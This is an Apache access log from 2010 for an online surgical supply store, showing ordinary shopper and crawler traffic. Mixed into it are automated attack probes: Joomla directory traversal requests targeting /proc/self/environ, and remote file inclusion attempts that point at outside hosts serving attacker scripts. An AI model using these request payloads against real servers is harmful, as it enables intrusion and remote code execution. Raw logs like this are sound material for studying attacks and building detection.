121.169.189.169 - - [23/Jun/2010:05:17:10 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:10 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:10 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:10 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:10 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:10 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:10 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:10 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:10 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:11 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:11 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:11 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:11 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:11 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:20 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L028AA66C48B4A702A7DC021+M37+ENG HTTP/1.1" 200 37542 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:36 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L028AA66C48B4A702A7DC021+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:37 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L028AA66C48B4A702A7DC021+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:37 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L028AA66C48B4A702A7DC021+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:37 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L028AA66C48B4A702A7DC021+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:37 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L028AA66C48B4A702A7DC021+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:37 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L028AA66C48B4A702A7DC021+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:37 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L028AA66C48B4A702A7DC021+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:37 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L028AA66C48B4A702A7DC021+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:37 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L028AA66C48B4A702A7DC021+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:37 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L028AA66C48B4A702A7DC021+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:37 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L028AA66C48B4A702A7DC021+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:37 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L028AA66C48B4A702A7DC021+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:37 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L028AA66C48B4A702A7DC021+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:37 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L028AA66C48B4A702A7DC021+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:37 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L028AA66C48B4A702A7DC021+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:39 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L028AA66C48B4A702A7DC021+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:39 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L028AA66C48B4A702A7DC021+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:39 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L028AA66C48B4A702A7DC021+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:39 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L028AA66C48B4A702A7DC021+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:39 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L028AA66C48B4A702A7DC021+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:39 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L028AA66C48B4A702A7DC021+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:39 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L028AA66C48B4A702A7DC021+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:39 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L028AA66C48B4A702A7DC021+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:39 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L028AA66C48B4A702A7DC021+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:39 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L028AA66C48B4A702A7DC021+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:39 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
67.15.152.183 - - [23/Jun/2010:05:17:40 -0400] "GET //*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 204 "-" "libwww-perl/5.65"
66.249.71.209 - - [23/Jun/2010:05:17:35 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L010BDD521EB254000FBC08P+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
121.169.189.169 - - [23/Jun/2010:05:17:40 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L028AA6694164C700CAFC021+M37+ENG HTTP/1.1" 200 77667 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L028AA66C48B4A702A7DC021+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:49 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L028AA6694164C700CAFC021+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:49 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L028AA6694164C700CAFC021+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:49 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L028AA6694164C700CAFC021+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:49 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:51 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L028AA66543643700D7AC021+M37+ENG HTTP/1.1" 200 43084 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:56 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L028AA66543643700D7AC021+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:56 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L028AA66543643700D7AC021+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:17:56 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
74.208.149.56 - - [23/Jun/2010:05:18:21 -0400] "GET //appserv/main.php?appserv_root=http://www.cantinalatina.nl/adm? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
74.208.149.56 - - [23/Jun/2010:05:18:21 -0400] "GET /logs//appserv/main.php?appserv_root=http://www.cantinalatina.nl/adm? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
74.208.149.56 - - [23/Jun/2010:05:18:21 -0400] "GET /logs/access_log.Q110021100//appserv/main.php?appserv_root=http://www.cantinalatina.nl/adm? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
74.208.149.56 - - [23/Jun/2010:05:18:38 -0400] "GET /logs/error_log.Q110021100//appserv/main.php?appserv_root=http://www.cantinalatina.nl/adm? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
74.208.149.56 - - [23/Jun/2010:05:18:49 -0400] "GET //appserv/main.php?appserv_root=http://www.cantinalatina.nl/adm? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
74.208.149.56 - - [23/Jun/2010:05:18:49 -0400] "GET /logs//appserv/main.php?appserv_root=http://www.cantinalatina.nl/adm? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
74.208.149.56 - - [23/Jun/2010:05:18:49 -0400] "GET /logs/access_log.Q110021100//appserv/main.php?appserv_root=http://www.cantinalatina.nl/adm? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
85.223.63.220 - - [23/Jun/2010:05:18:52 -0400] "GET /logs/error_log.Q110061700//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
85.223.63.220 - - [23/Jun/2010:05:18:54 -0400] "GET /logs/error_log.Q110061700//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
94.136.35.223 - - [23/Jun/2010:05:18:54 -0400] "GET /logs/access_log.Q110061300///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 236 "-" "libwww-perl/5.808"
94.136.35.223 - - [23/Jun/2010:05:18:55 -0400] "GET ///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 209 "-" "libwww-perl/5.808"
94.136.35.223 - - [23/Jun/2010:05:18:55 -0400] "GET /logs///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 214 "-" "libwww-perl/5.808"
95.131.67.183 - - [23/Jun/2010:05:18:58 -0400] "GET ///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 209 "-" "libwww-perl/5.810"
95.131.67.183 - - [23/Jun/2010:05:19:05 -0400] "GET ///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 209 "-" "libwww-perl/5.810"
94.136.35.223 - - [23/Jun/2010:05:19:05 -0400] "GET ///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 209 "-" "libwww-perl/5.808"
95.131.67.183 - - [23/Jun/2010:05:19:05 -0400] "GET /logs/access_log.Q110061300///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 236 "-" "libwww-perl/5.810"
95.131.67.183 - - [23/Jun/2010:05:19:05 -0400] "GET ///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 209 "-" "libwww-perl/5.810"
95.131.67.183 - - [23/Jun/2010:05:19:06 -0400] "GET /logs///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 214 "-" "libwww-perl/5.810"
74.208.149.56 - - [23/Jun/2010:05:19:07 -0400] "GET /logs/error_log.Q110021100//appserv/main.php?appserv_root=http://www.cantinalatina.nl/adm? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
94.136.35.223 - - [23/Jun/2010:05:19:14 -0400] "GET ///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 209 "-" "libwww-perl/5.808"
67.195.114.223 - - [23/Jun/2010:05:19:36 -0400] "GET /images/_notes/nav_store_history_off_r1_c2.jpg.mno HTTP/1.0" 200 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.55.238.226 - - [23/Jun/2010:05:19:49 -0400] "GET //?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 452 "-" "libwww-perl/5.828"
67.195.114.223 - - [23/Jun/2010:05:19:52 -0400] "GET /images/_notes/nav_store_search_org2.jpg.mno HTTP/1.0" 200 248 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
216.97.226.230 - - [23/Jun/2010:05:19:53 -0400] "GET //?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 452 "-" "libwww-perl/5.833"
67.30.129.57 - - [23/Jun/2010:05:19:53 -0400] "GET /logs/error_log.Q109050700//PhpLinkExchange/bits_listings.php?svr_rootP=http://juh.fileave.com/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
94.136.35.223 - - [23/Jun/2010:05:19:56 -0400] "GET ///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 209 "-" "libwww-perl/5.808"
203.124.61.46 - - [23/Jun/2010:05:20:00 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
203.124.61.46 - - [23/Jun/2010:05:20:00 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
95.131.67.183 - - [23/Jun/2010:05:20:02 -0400] "GET ///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 209 "-" "libwww-perl/5.810"
67.30.129.57 - - [23/Jun/2010:05:20:11 -0400] "GET /logs/error_log.Q109050700//PhpLinkExchange/bits_listings.php?svr_rootP=http://juh.fileave.com/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
95.131.67.183 - - [23/Jun/2010:05:20:52 -0400] "GET /logs/access_log.Q110052800///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 236 "-" "libwww-perl/5.810"
95.131.67.183 - - [23/Jun/2010:05:20:52 -0400] "GET ///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 209 "-" "libwww-perl/5.810"
95.131.67.183 - - [23/Jun/2010:05:20:52 -0400] "GET /logs///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 214 "-" "libwww-perl/5.810"
94.136.35.223 - - [23/Jun/2010:05:20:54 -0400] "GET /logs/access_log.Q110052800///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 236 "-" "libwww-perl/5.808"
94.136.35.223 - - [23/Jun/2010:05:20:54 -0400] "GET ///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 209 "-" "libwww-perl/5.808"
94.136.35.223 - - [23/Jun/2010:05:20:54 -0400] "GET /logs///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 214 "-" "libwww-perl/5.808"
94.136.35.223 - - [23/Jun/2010:05:21:11 -0400] "GET /logs/access_log.Q110052700///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 236 "-" "libwww-perl/5.808"
94.136.35.223 - - [23/Jun/2010:05:21:11 -0400] "GET ///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 209 "-" "libwww-perl/5.808"
94.136.35.223 - - [23/Jun/2010:05:21:11 -0400] "GET /logs///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 214 "-" "libwww-perl/5.808"
95.108.245.251 - - [23/Jun/2010:05:21:20 -0400] "GET /logs/error_log.Q109071100 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
74.55.238.226 - - [23/Jun/2010:05:21:32 -0400] "GET /logs/access_log.Q110061500//?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 226 "-" "libwww-perl/5.828"
74.55.238.226 - - [23/Jun/2010:05:21:33 -0400] "GET //?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 452 "-" "libwww-perl/5.828"
67.195.114.223 - - [23/Jun/2010:05:20:35 -0400] "GET /logs/access_log.Q109110300 HTTP/1.0" 200 6323898 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
